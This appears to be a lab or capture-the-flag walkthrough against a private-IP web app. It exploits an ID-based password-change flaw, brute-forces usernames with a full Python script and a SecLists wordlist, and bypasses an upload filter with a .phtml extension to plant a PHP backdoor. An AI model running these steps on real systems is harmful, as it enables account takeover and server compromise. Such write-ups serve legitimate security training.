Registered as cxnsxle there is a resource to change our password by using the id
We actually can change the password of any user for example id=1
I created a brute force script with Python to guess the user with id=1
#!/usr/bin/python3
from requests import Session
from pprint import pprint
import sys
# print session data
def print_sess(session):
print("COOKIES")
pprint(session.cookies)
print("HEADERS")
pprint(session.headers)
# to perform requests without HTTPS validation
def session_cleaned():
s = Session()
s.trust_env = True # allow usage of HTTP_PROXY env var for DEBUG
s.verify = False # curl -k
headers = {
"Content-Type": "application/x-www-form-urlencoded",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0",
}
proxies = {
'http': '<http://127.0.0.1:8080>'
}
s.headers.update(headers)
s.proxies.update(proxies)
return s
def login(session, username, password):
# data
data = {
"username": username,
"password": password
}
# send GET request on /index.php to validate the cookie: nagiosxi
login_response = session.post(
url=f"{main_url}/login.php",
data=data,
allow_redirects=False
)
return login_response
def brute_force(session):
wl_path = sys.argv[1]
with open(wl_path) as f:
wordlist = [word.replace('\\n','') for word in f]
for word in wordlist:
response = login(session, word, "cxnsxle123")
if response.status_code == 302:
print('PWNED ->', word, ": cxnsxle123")
break
if __name__ == "__main__":
main_url = "<http://192.168.200.153>"
sess = session_cleaned()
brute_force(sess)
And execute it with this wordlist of users
python3 bf.py /usr/share/SecLists/Usernames/Names/names.txt
Now I can log in as admin
This user can upload files and are stored at http://192.168.200.153/upload/
I uploaded PHP backdoor but it doesnโt work
It only accepts jpb, png and gif files
I discovered a extension to avoid this WAF by using the .phtml extension